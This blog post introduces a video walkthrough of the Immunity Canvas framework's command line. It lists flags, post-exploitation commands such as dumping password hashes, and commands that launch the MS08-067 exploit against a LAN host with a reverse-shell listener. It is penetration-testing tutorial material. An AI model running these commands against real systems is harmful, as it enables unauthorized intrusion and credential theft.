Sunday, April 24, 2011

Immunity Canvas Code and CMDLine Walkthrough

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps



Note:
I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..

Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run


Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.


CMDLINE Flags:
-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port

PostEx Stuff:
help
runmodule getpasswordhashes
shellshocked
ps
killprocess

Running Exploit Without a Listener
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -v

Running Exploit with Listener
./commandlineinterface.py -v 10 -p 4445
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -l 192.168.1.121 -d 4445

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Real World Social Engineering Part 2: Integrating SE With Stealth Badge Readers Tips and Tricks

 Below is a video on using stealth readers with social engineering to gain access to physical targets on your penetration tests..   This is ...